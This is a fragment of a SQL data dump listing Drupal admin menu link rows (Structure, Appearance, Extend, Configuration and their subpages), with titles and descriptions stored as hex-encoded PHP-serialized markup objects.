('admin', 10, 'system.admin_structure', 'system.admin', 'system.admin_structure', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a393a22537472756374757265223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34353a2241646d696e697374657220626c6f636b732c20636f6e74656e742074797065732c206d656e75732c206574632e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -8, 0x613a303a7b7d, 1, 2, 6, 10, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 11, 'block.admin_display', 'system.admin_structure', 'block.admin_display', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22426c6f636b206c61796f7574223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37393a22436f6e666967757265207768617420626c6f636b20636f6e74656e74206170706561727320696e20796f75722073697465277320736964656261727320616e64206f7468657220726567696f6e732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'block', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 11, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 12, 'entity.comment_type.collection', 'system.admin_structure', 'entity.comment_type.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6d6d656e74207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34363a224d616e61676520666f726d20616e6420646973706c6179732073657474696e6773206f6620636f6d6d656e74732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'comment', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 12, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 13, 'entity.contact_form.collection', 'system.admin_structure', 'entity.contact_form.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e7461637420666f726d73223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33323a2243726561746520616e64206d616e61676520636f6e7461637420666f726d732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'contact', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 13, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 14, 'field_ui.display_mode', 'system.admin_structure', 'field_ui.display_mode', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22446973706c6179206d6f646573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36353a22436f6e666967757265207768617420646973706c6179732061726520617661696c61626c6520666f7220796f757220636f6e74656e7420616e6420666f726d732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'field_ui', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 14, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 15, 'entity.entity_view_mode.collection', 'field_ui.display_mode', 'entity.entity_view_mode.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a2256696577206d6f646573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32353a224d616e61676520637573746f6d2076696577206d6f6465732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'field_ui', 1, 1, 0, 0, 0x613a303a7b7d, 1, 4, 6, 10, 14, 15, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 16, 'entity.entity_form_mode.collection', 'field_ui.display_mode', 'entity.entity_form_mode.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a22466f726d206d6f646573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32353a224d616e61676520637573746f6d20666f726d206d6f6465732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'field_ui', 1, 1, 0, 0, 0x613a303a7b7d, 1, 4, 6, 10, 14, 16, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 17, 'entity.menu.collection', 'system.admin_structure', 'entity.menu.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a224d656e7573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32383a224d616e616765206d656e757320616e64206d656e75206c696e6b732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'menu_ui', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 17, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 18, 'entity.node_type.collection', 'system.admin_structure', 'entity.node_type.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e74656e74207479706573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37313a2243726561746520616e64206d616e616765206669656c64732c20666f726d732c20616e6420646973706c61792073657474696e677320666f7220796f757220636f6e74656e742e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'node', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 18, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 19, 'entity.taxonomy_vocabulary.collection', 'system.admin_structure', 'entity.taxonomy_vocabulary.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a225461786f6e6f6d79223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36373a224d616e6167652074616767696e672c2063617465676f72697a6174696f6e2c20616e6420636c617373696669636174696f6e206f6620796f757220636f6e74656e742e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'taxonomy', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 19, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 20, 'entity.view.collection', 'system.admin_structure', 'entity.view.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a225669657773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33353a224d616e61676520637573746f6d697a6564206c69737473206f6620636f6e74656e742e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'views_ui', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 10, 20, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 21, 'system.themes_page', 'system.admin', 'system.themes_page', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a22417070656172616e6365223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32383a2253656c65637420616e6420636f6e666967757265207468656d65732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -6, 0x613a303a7b7d, 1, 2, 6, 21, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 22, 'system.modules_list', 'system.admin', 'system.modules_list', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a363a22457874656e64223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35333a2241646420616e6420696e7374616c6c206d6f64756c657320746f20657874656e6420736974652066756e6374696f6e616c6974792e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -2, 0x613a303a7b7d, 1, 2, 6, 22, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 23, 'system.admin_config', 'system.admin', 'system.admin_config', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32303a2241646d696e69737465722073657474696e67732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 0, 0x613a303a7b7d, 1, 2, 6, 23, 0, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 24, 'system.admin_config_media', 'system.admin_config', 'system.admin_config_media', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a224d65646961223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -10, 0x613a303a7b7d, 1, 3, 6, 23, 24, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 25, 'entity.image_style.collection', 'system.admin_config_media', 'entity.image_style.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22496d616765207374796c6573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37383a22436f6e666967757265207374796c657320746861742063616e206265207573656420666f7220726573697a696e67206f722061646a757374696e6720696d61676573206f6e20646973706c61792e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'image', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 23, 24, 25, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 26, 'system.file_system_settings', 'system.admin_config_media', 'system.file_system_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a2246696c652073797374656d223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36373a22436f6e66696775726520746865206c6f636174696f6e206f662075706c6f616465642066696c657320616e6420686f772074686579206172652061636365737365642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 23, 24, 26, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 27, 'system.image_toolkit_settings', 'system.admin_config_media', 'system.image_toolkit_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22496d61676520746f6f6c6b6974223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37343a2243686f6f736520776869636820696d61676520746f6f6c6b697420746f2075736520696620796f75206861766520696e7374616c6c6564206f7074696f6e616c20746f6f6c6b6974732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 20, 0x613a303a7b7d, 0, 4, 6, 23, 24, 27, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 28, 'system.admin_config_services', 'system.admin_config', 'system.admin_config_services', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22576562207365727669636573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x733a303a22223b, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 0, 0x613a303a7b7d, 1, 3, 6, 23, 28, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 29, 'system.rss_feeds_settings', 'system.admin_config_services', 'system.rss_feeds_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a22525353207075626c697368696e67223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a3131353a22436f6e666967757265207468652073697465206465736372697074696f6e2c20746865206e756d626572206f66206974656d732070657220666565642c20616e6420776865746865722066656564732073686f756c64206265207469746c65732f746561736572732f66756c6c2d746578742e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, 0, 0x613a303a7b7d, 0, 4, 6, 23, 28, 29, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 30, 'system.admin_config_development', 'system.admin_config', 'system.admin_config_development', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a22446576656c6f706d656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33363a22436f6e66696775726520616e642075736520646576656c6f706d656e7420746f6f6c732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -10, 0x613a303a7b7d, 1, 3, 6, 23, 30, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 31, 'config.sync', 'system.admin_config_development', 'config.sync', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32393a22436f6e66696775726174696f6e2073796e6368726f6e697a6174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a33373a22496d706f727420616e64206578706f727420796f757220636f6e66696775726174696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'config', 1, 1, 0, 0, 0x613a303a7b7d, 1, 4, 6, 23, 30, 31, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 32, 'system.site_maintenance_mode', 'system.admin_config_development', 'system.site_maintenance_mode', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31363a224d61696e74656e616e6365206d6f6465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36323a2254616b65207468652073697465206f66666c696e6520666f72207570646174657320616e64206f74686572206d61696e74656e616e6365207461736b732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -10, 0x613a303a7b7d, 0, 4, 6, 23, 30, 32, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 33, 'system.performance_settings', 'system.admin_config_development', 'system.performance_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31313a22506572666f726d616e6365223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34353a22436f6e6669677572652063616368696e6720616e642062616e647769647468206f7074696d697a6174696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -20, 0x613a303a7b7d, 0, 4, 6, 23, 30, 33, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 34, 'system.logging_settings', 'system.admin_config_development', 'system.logging_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31383a224c6f6767696e6720616e64206572726f7273223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a36313a22436f6e6669677572652074686520646973706c6179206f66206572726f72206d6573736167657320616e64206461746162617365206c6f6767696e672e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -15, 0x613a303a7b7d, 0, 4, 6, 23, 30, 34, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 35, 'system.admin_config_regional', 'system.admin_config', 'system.admin_config_regional', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a22526567696f6e20616e64206c616e6775616765223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35393a22436f6e66696775726520726567696f6e616c2073657474696e67732c206c6f63616c697a6174696f6e2c20616e64207472616e736c6174696f6e2e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -5, 0x613a303a7b7d, 1, 3, 6, 23, 35, 0, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 36, 'system.regional_settings', 'system.admin_config_regional', 'system.regional_settings', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31373a22526567696f6e616c2073657474696e6773223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34333a22436f6e66696775726520746865206c6f63616c6520616e642074696d657a6f6e652073657474696e67732e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -20, 0x613a303a7b7d, 0, 4, 6, 23, 35, 36, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
('admin', 37, 'entity.date_format.collection', 'system.admin_config_regional', 'entity.date_format.collection', '', 0x613a303a7b7d, '', 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32313a224461746520616e642074696d6520666f726d617473223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 0x4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a34343a22436f6e66696775726520686f7720646174657320616e642074696d65732061726520646973706c617965642e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d, 'Drupal\\Core\\Menu\\MenuLinkDefault', 0x613a303a7b7d, 'system', 1, 1, 0, -9, 0x613a303a7b7d, 0, 4, 6, 23, 35, 37, 0, 0, 0, 0, 0, 'Drupal\\Core\\Menu\\Form\\MenuLinkDefaultForm'),
